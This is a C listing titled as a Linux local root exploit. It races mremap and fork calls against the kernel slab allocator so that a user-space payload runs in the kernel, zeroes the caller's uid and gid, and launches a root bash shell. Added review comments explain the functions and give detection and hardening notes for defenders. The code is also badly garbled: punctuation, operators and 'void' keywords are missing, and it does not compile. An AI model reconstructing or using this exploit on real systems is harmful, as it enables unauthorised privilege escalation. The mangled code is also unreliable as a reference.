2.6.18 408 / 3.2.6 2012 Local Root Exploit
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>

#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>

#include <asm/page.h>

/*
 * NOTE(review): this listing was damaged when the forum page was extracted.
 * Commas, semicolons inside for(...), several operators and short identifiers
 * are missing throughout, and the keyword `void` appears to have been replaced
 * by `****` . It does not compile as shown; the comments in this file describe
 * only what the surviving text establishes.
 */
#define MREMAP_MAYMOVE    1
#define MREMAP_FIXED    2

#define str(s)     #s
#define xstr(s) str(s)

#define DSIGNAL        SIGCHLD
#define CLONEFL        (DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK)
/*
 * Fixed low user-space address used by the MAP_FIXED / MREMAP_FIXED calls.
 * Systems with vm.mmap_min_addr set above 0x2000 refuse such mappings for
 * unprivileged processes.
 */
#define PAGEADDR    0x2000

#define RNDINT        512

/* Iteration counts: 3855 remap/map rounds and 1,114,129 fork/clone rounds. */
#define NUMVMA        (3 * 5 * 257)
#define NUMFORK        (17 * 65537)

/* File-descriptor number used as the dup2() target in several places. */
#define DUPTO        1000
#define TMPLEN        256

/*
 * 163 is the mremap syscall number on 32-bit x86; main() also issues
 * `int $0x80` with 120 (clone on i386), so the code is tied to i386.
 * NOTE(review): _syscall5 is a legacy kernel-header macro and <asm/page.h> is
 * included above; neither is usable from user space with newer kernel
 * headers. Nothing in the listing supports the kernel versions named in the
 * thread title - treat that title as unverified when triaging.
 */
#define __NR_sys_mremap    163

_syscall5(ulongsys_mremapulongaulongbulongculongdulonge);
unsigned long sys_mremap(unsigned long addrunsigned long old_lenunsigned long
new_len
,
             
unsigned long flagsunsigned long new_addr);


/*
 * State shared between main(), the forked helpers and the signal handlers
 * (blah is incremented from the catchme() handler, hence volatile).
 */
static 
volatile int pid 0ppidhpid, *victim, *fopsblah 0dummy 0uid,
gid;
static 
volatile int *vma_ro, *vma_rw, *tmp;
/* Filled by main() so that every element holds the address of the fops page. */
static 
volatile unsigned fake_file[16];


/*
 * Report an error and park the process; this function never returns.
 *
 * When errno is 0 the message is written to stderr with a "FATAL:" prefix,
 * otherwise perror() is used. Both streams are flushed and the process then
 * sits in pause() inside an endless loop instead of exiting.
 *
 * NOTE(review): the parameter is shown as `const char msg`; the pointer
 * declarator was presumably lost in extraction.
 */
**** 
fatal(const char msg)
{
    
printf("\n");
    if (!
errno) {
        
fprintf(stderr"FATAL: %s\n"msg);
    } else {
        
perror(msg);
    }

    
printf("\nentering endless loop");
    
fflush(stdout);
    
fflush(stderr);
    while (
1pause();
}

/*
 * Payload whose address main() writes into every slot of the `fops` page.
 *
 * The (file, offset, origin) parameter list has the shape of a file seek
 * handler; presumably it is meant to be reached through the lseek() on
 * descriptor DUPTO in try_to_exploit() - the listing does not show the
 * kernel side, so confirm.
 *
 * NOTE(review): the body only has an effect if the kernel executes this
 * user-space function and if the caller's uid/gid words are stored inline in
 * the 8 KiB region containing the current stack. Kernels that keep
 * credentials in a separate structure, and SMEP/SMAP enforcement, break
 * those assumptions.
 */
**** 
kernel_code(**** * fileloff_t offsetint origin)
{
    
int ic;
    
int *v;

    /* A null `file` argument skips the scan entirely. */
    if (!
file)
        goto 
out;

    /* Read the stack pointer, round it down to an 8 KiB boundary
     * (mask 0xffffe000) and treat that address as an array of int. */
    
__asm__("movl    %%esp, %0" : : "m" (c));

    
&= 0xffffe000;
    
= (**** *) c;

    /* Scan that page for words equal to the uid / gid saved by main() and
     * overwrite the matching runs with 0; stops after the gid match. */
    for (
0PAGE_SIZE sizeof(*v) - 1i++) {
        if (
v[i] == uid && v[i+1] == uid) {
            
i++; v[i++] = 0v[i++] = 0v[i++] = 0;
        }
        if (
v[i] == gid) {
            
v[i++] = 0v[i++] = 0v[i++] = 0v[i++] = 0;
            break;
        }
    }
out:
    /* Touches the volatile global; no other visible purpose. */
    
dummy++;
}

/*
 * Final step, called from the last child created in main(): issue the
 * lseek() on descriptor DUPTO, then check whether the effective uid is 0
 * and, if so, start a shell. On failure it ends in fatal() and never returns.
 *
 * Detection: the observable outcome is an unprivileged process whose
 * effective uid becomes 0 without executing a setuid binary, followed by
 * setresuid(0, 0, 0) and an exec of /bin/bash. Auditing execve and
 * setresuid, or alerting on unexpected uid transitions, covers it.
 */
**** 
try_to_exploit(****)
{
    
int v 0;

    /* Reads fops[0] and fake_file[0] into v (operator lost in extraction);
     * presumably only to touch both objects before use. */
    
+= fops[0];
    
+= fake_file[0];

    /* Direct user-space call; the first argument appears to be 0, in which
     * case kernel_code() jumps straight to `out` and only bumps `dummy`. */
    
kernel_code(00v);
    
lseek(DUPTO0SEEK_SET);

    if (
geteuid()) {
        
printf("\nFAILED uid!=0"); fflush(stdout);
        /* `=-` parses as assignment of the negated value: errno = -ENOSYS. */
        
errno =- ENOSYS;
        
fatal("uid change");
    }

    
printf("\n[+] PID %d GOT UID 0, enjoy!"getpid()); fflush(stdout);

    /* Notify the original parent, then set real/effective/saved uid. */
    
kill(ppidSIGUSR1);
    
setresuid(000);
    
sleep(1);

    
printf("\n\n"); fflush(stdout);

    
execl("/bin/bash""bash"NULL);
    /* Only reached if execl() fails. */
    
fatal("burp");
}

/*
 * SIGUSR1 handler installed by redirect_filp(): copies victim[0] back into
 * victim[DUPTO] and sends SIGUSR2 to every process in the caller's process
 * group (kill() with pid 0). The signal number argument is unused.
 */
**** 
cleanup(int v)
{
    
victim[DUPTO] = victim[0];
    
kill(0SIGUSR2);
}


/*
 * SIGUSR1 handler installed by unprotect(). Checks whether slot DUPTO of the
 * `victim` page is non-zero and equal to slot 0; if so it stores the address
 * of the user-space fake_file array in slot DUPTO, makes cleanup() the next
 * SIGUSR1 handler and signals `pid`. Otherwise it only prints "FAILED!".
 *
 * NOTE(review): printf() and fflush() are called from a signal handler; they
 * are not async-signal-safe.
 */
**** 
redirect_filp(int v)
{
    
printf("\n[!] parent check race... "); fflush(stdout);

    if (
victim[DUPTO] && victim[0] == victim[DUPTO]) {
        
printf("SUCCESS, cought SLAB page!"); fflush(stdout);
        /* Address is truncated to `unsigned`, i.e. a 32-bit pointer is assumed. */
        
victim[DUPTO] = (unsigned) & fake_file;
        
signal(SIGUSR1, &cleanup);
        
kill(pidSIGUSR1);
    } else {
        
printf("FAILED!");
    }
    
fflush(stdout);
}

/*
 * Read /proc/slabinfo and look for the line whose cache name is "size-4096".
 *
 * Returns a value parsed from that line, or -1; the return expression and the
 * names of the parsed fields are damaged in this listing. Calls fatal() (which
 * does not return) if the file cannot be opened.
 *
 * NOTE(review): on current kernels /proc/slabinfo is readable by root only,
 * and SLUB-based kernels name this cache kmalloc-4096, so on such systems the
 * fopen() fails or the name never matches - confirm on the system at hand.
 */
int get_slab_objs(****)
{
    
FILE fp;
    
int cd00;
    static 
char line[TMPLEN], name[TMPLEN];

    
fp fopen("/proc/slabinfo""r");
    if (!
fp)
        
fatal("fopen");

    /* Consume the first line of the file before scanning the entries. */
    
fgets(namesizeof(name) - 1fp);
    /* Read one line per iteration until the name matches or input ends. */
    do {
        
=- 1;
        if (!
fgets(linesizeof(line) - 1fp))
            break;
sscanf(line"%s %u %u %u %u %u %u"name, &u, &a, &d, &d, &d, &d);
    } while (
strcmp(name"size-4096"));
   
    
fclose(fp);

    return 
== : -1;
}

/*
 * SIGUSR1 handler installed by main(). Writes 0 to *victim, duplicates
 * descriptor 0 onto 2, then loops on get_slab_objs(), signalling the helper
 * process (hpid) with SIGUSR1 and waiting for `blah` to be set, until the
 * returned count reaches zero; at that point it duplicates descriptor 0 onto
 * DUPTO. Finally it makes redirect_filp() the SIGUSR1 handler and signals
 * `pid`.
 *
 * NOTE(review): the comparisons on the slab count are damaged (`if ( 0)`);
 * the branch conditions described above are inferred from the messages.
 * stdio calls and a blocking loop run inside a signal handler here.
 */
**** 
unprotect(int v)
{
    
int n1;

    *
victim 0;
    
printf("\n[+] parent unprotected PTE "); fflush(stdout);

    
dup2(02);
    while (
1) {
        
get_slab_objs();
        /* Presumably the n < 0 error case. */
        if (
0)
            
fatal("read slabinfo");
        /* Presumably the n > 0 case: ask the helper to fork another child. */
        if (
0) {
            
printf("\n    depopulate SLAB #%d"c++);
            
blah 0kill(hpidSIGUSR1);
            while (!
blahpause();
        }
        if (!
n) {
            
blah 0kill(hpidSIGUSR1);
            while (!
blahpause();
            
dup2(0DUPTO);
            break;
        }
    }

    
signal(SIGUSR1, &redirect_filp);
    
kill(pidSIGUSR1);
}

/*
 * Place fresh anonymous MAP_FIXED mappings at an address derived from
 * PAGEADDR and PAGE_SIZE (operator lost in extraction), alternating
 * read-only and read-write protection, until NUMVMA mappings have been made.
 * The error messages call this "unmapping", so it presumably replaces the
 * mappings created by the mremap loop in main(). Calls fatal() if mmap()
 * does not return the requested address.
 */
**** 
cleanup_vmas(****)
{
    
int i NUMVMA;

    while (
1) {
        /* Read-only mapping. */
        
tmp mmap((**** *) (PAGEADDR PAGE_SIZE), PAGE_SIZEPROT_READ,
                
MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE00);
        if (
tmp != (**** *) (PAGEADDR PAGE_SIZE)) {
            
printf("\n[-] ERROR unmapping %d"i); fflush(stdout);
            
fatal("unmap1");
        }
        
i--;
        if (!
i)
            break;

    /* Read-write mapping at the same address. */
    
tmp mmap((**** *) (PAGEADDR PAGE_SIZE), PAGE_SIZEPROT_READ|PROT_WRITE,
                
MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS00);
    if (
tmp != (**** *) (PAGEADDR PAGE_SIZE)) {
            
printf("\n[-] ERROR unmapping %d"i); fflush(stdout);
            
fatal("unmap2");
        }
        
i--;
        if (!
i)
            break;
    }
}

/*
 * Signal handler that increments the volatile flag `blah`; the
 * `while (!blah) pause();` loops elsewhere in the file wait on it.
 */
**** 
catchme(int v)
{
    
blah++;
}

/*
 * Signal handler that terminates the process immediately with status 0 via
 * _exit(); slab_helper() installs it for SIGUSR2.
 */
**** 
exitme(int v)
{
    
_exit(0);
}

/*
 * SIGCHLD handler installed by main(): reaps one terminated child without
 * blocking (waitpid on any child with WNOHANG).
 */
**** 
childrip(int v)
{
    
waitpid(-10WNOHANG);
}

/*
 * Body of the helper process forked first by main() (its pid is kept in
 * hpid). Installs catchme() for SIGUSR1 and exitme() for SIGUSR2, then for
 * every SIGUSR1 received forks one child. Each child duplicates descriptor 0
 * onto DUPTO, signals the helper and sleeps in pause() forever; the helper
 * waits for that signal and then sends SIGUSR2 to the original parent (ppid).
 *
 * The trailing exit(0) is unreachable because the loop never terminates.
 */
**** 
slab_helper(****)
{
    
signal(SIGUSR1, &catchme);
    
signal(SIGUSR2, &exitme);
    
blah 0;

    while (
1) {
        /* Wait for a request from the parent. */
        while (!
blahpause();

        
blah 0;
        if (!
fork()) {
            /* Child: hold one more open descriptor and stay alive. */
            
dup2(0DUPTO);
            
kill(getppid(), SIGUSR1);
            while (
1pause();
        } else {
            /* Helper: wait for the child's signal, then notify ppid. */
            while (!
blahpause();
            
blah 0kill(ppidSIGUSR2);
        }
    }
    exit(
0);
}

/*
 * Program entry point. Visible stages:
 *   1. seed rand(), record ppid/uid/gid, fork the slab_helper() process;
 *   2. map one RWX page (`fops`) filled with the address of kernel_code()
 *      and fill fake_file[] with the address of that page;
 *   3. map a read-only and a read-write page and call the raw mremap stub
 *      NUMVMA times with MREMAP_FIXED|MREMAP_MAYMOVE towards PAGEADDR;
 *   4. map the RWX `victim` page at PAGEADDR with MAP_FIXED;
 *   5. install the signal handlers and run a fork/clone loop of up to
 *      NUMFORK iterations with a progress display;
 *   6. in the last child: cleanup_vmas(), munmap/dup2 steps synchronised
 *      with the parent over SIGUSR1, then try_to_exploit().
 *
 * Defender view: the behaviour is noisy - roughly 1.1 million fork/clone
 * calls, thousands of mremap calls with MREMAP_FIXED, an RWX anonymous
 * mapping and a MAP_FIXED mapping at 0x2000. Fork-rate monitoring, syscall
 * auditing of mremap/mmap and a vm.mmap_min_addr above 0x2000 address these.
 *
 * NOTE(review): many operators and operands are missing (see `cnt 1`,
 * `<= && cnt 0`), and the closing brace of main() is absent from the listing.
 */
int main(****)
{
    
int irvcnt;
    
time_t start;

    
srand(time(NULL) + getpid());
    
ppid getpid();
    
uid getuid();
    
gid getgid();

    /* The child never returns from slab_helper(). */
    
hpid fork();
    if (!
hpid)
        
slab_helper();

    /* User-space page that is readable, writable and executable; every word
     * is set to the address of kernel_code(). */
    
fops mmap(0PAGE_SIZEPROT_EXEC|PROT_READ|PROT_WRITE,
            
MAP_PRIVATE|MAP_ANONYMOUS00);
    if (
fops == MAP_FAILED)
        
fatal("mmap fops VMA");
    for (
0PAGE_SIZE sizeof(*fops); i++)
        
fops[i] = (unsigned)&kernel_code;
    for (
0sizeof(fake_file) / sizeof(*fake_file); i++)
        
fake_file[i] = (unsigned)fops;

    
vma_ro mmap(0PAGE_SIZEPROT_READMAP_PRIVATE|MAP_ANONYMOUS00);
    if (
vma_ro == MAP_FAILED)
        
fatal("mmap1");

    
vma_rw mmap(0PAGE_SIZEPROT_READ|PROT_WRITEMAP_PRIVATE|MAP_ANONYMOUS00);
    if (
vma_rw == MAP_FAILED)
        
fatal("mmap2");

    /* Alternate raw mremap calls on the two pages, NUMVMA in total; the two
     * length arguments appear to be 0 in the surviving text. */
    
cnt NUMVMA;
    while (
1) {
        
sys_mremap((ulong)vma_ro00MREMAP_FIXED|MREMAP_MAYMOVEPAGEADDR);
        if (
== (-1)) {
            
printf("\n[-] ERROR remapping"); fflush(stdout);
            
fatal("remap1");
        }
        
cnt--;
        if (!
cnt) break;

        
sys_mremap((ulong)vma_rw00MREMAP_FIXED|MREMAP_MAYMOVEPAGEADDR);
        if (
== (-1)) {
            
printf("\n[-] ERROR remapping"); fflush(stdout);
            
fatal("remap2");
        }
        
cnt--;
        if (!
cnt) break;
    }

    /* Fixed RWX mapping at PAGEADDR; must land exactly there. */
    
victim mmap((*****)PAGEADDRPAGE_SIZEPROT_EXEC|PROT_READ|PROT_WRITE,
            
MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS00);
    if (
victim != (**** *) PAGEADDR)
        
fatal("mmap victim VMA");

    
= *victim;
    *
victim 1;

    
signal(SIGUSR1, &unprotect);
    
signal(SIGUSR2, &catchme);
    
signal(SIGCHLD, &childrip);
    
printf("\n[+] Please wait...HEAVY SYSTEM LOAD!\n"); fflush(stdout);
    
start time(NULL);

    /* Fork/clone loop, counting down from NUMFORK. */
    
cnt NUMFORK;
    
0;
    while (
1) {
        
cnt--;
        
v--;
        
dummy += *victim;

        /* One branch issues syscall 120 (clone on i386) through int $0x80
         * with the CLONEFL flags; the other uses fork(). The condition that
         * selects between them is damaged. */
        if (
cnt 1) {
            
__asm__(
            
"pusha                \n"
            "movl %1, %%eax            \n"
            "movl $("
xstr(CLONEFL)"), %%ebx    \n"
            "movl %%esp, %%ecx        \n"
            "movl $120, %%eax        \n"
            "int  $0x80            \n"
            "movl %%eax, %0            \n"
            "popa                \n"
            
: : "m" (pid), "m" (dummy)
            );
        } else {
            
pid fork();
        }

        /* Parent side: progress/ETA output, then wait for the child. */
        if (
pid) {
            if (
<= && cnt 0) {
                
float etatm;
                
rand() % RNDINT RNDINT 2;
                
tm eta = (float)(time(NULL) - start);
                
eta *= (float)NUMFORK;
                
eta /= (float)(NUMFORK cnt);
                
printf("\r\t%u of %u [ %u %%  ETA %6.1f s ]          ",
                
NUMFORK cntNUMFORK, (100 * (NUMFORK cnt)) / NUMFORKeta tm);
                
fflush(stdout);
            }
            if (
cnt) {
                
waitpid(pid00);
                continue;
            }
            /* Last iteration: once the final child is reaped, restore the
             * mappings and stop the whole process group. */
            if (!
cnt) {
                while (
1) {
                     
wait(NULL);
                     if (
== pid) {
                    
cleanup_vmas();
                    while (
1) { kill(0SIGUSR2); kill(0SIGSTOP); pause(); }
                     }
                }
            }
        }

        /* Child side: all but the last child exit immediately. */
        else {
            
cleanup_vmas();

            if (
cnt 0) {
                
_exit(0);
            }

        
printf("\n[+] rooting done..the moment of truth..."); fflush(stdout);
            
sleep(1);

            /* Two SIGUSR1 handshakes with the parent, each preceded by a
             * munmap() and a dup2(); the parent's handlers are unprotect()
             * and then redirect_filp(). */
            
signal(SIGUSR1, &catchme);
            
munmap(0PAGE_SIZE);
            
dup2(02);
            
blah 0kill(ppidSIGUSR1);
            while (!
blahpause();

            
munmap((**** *)victimPAGE_SIZE);
            
dup2(0DUPTO);

            
blah 0kill(ppidSIGUSR1);
            while (!
blahpause();
            
try_to_exploit();
            while (
1pause();
        }
    }
    return 
0;
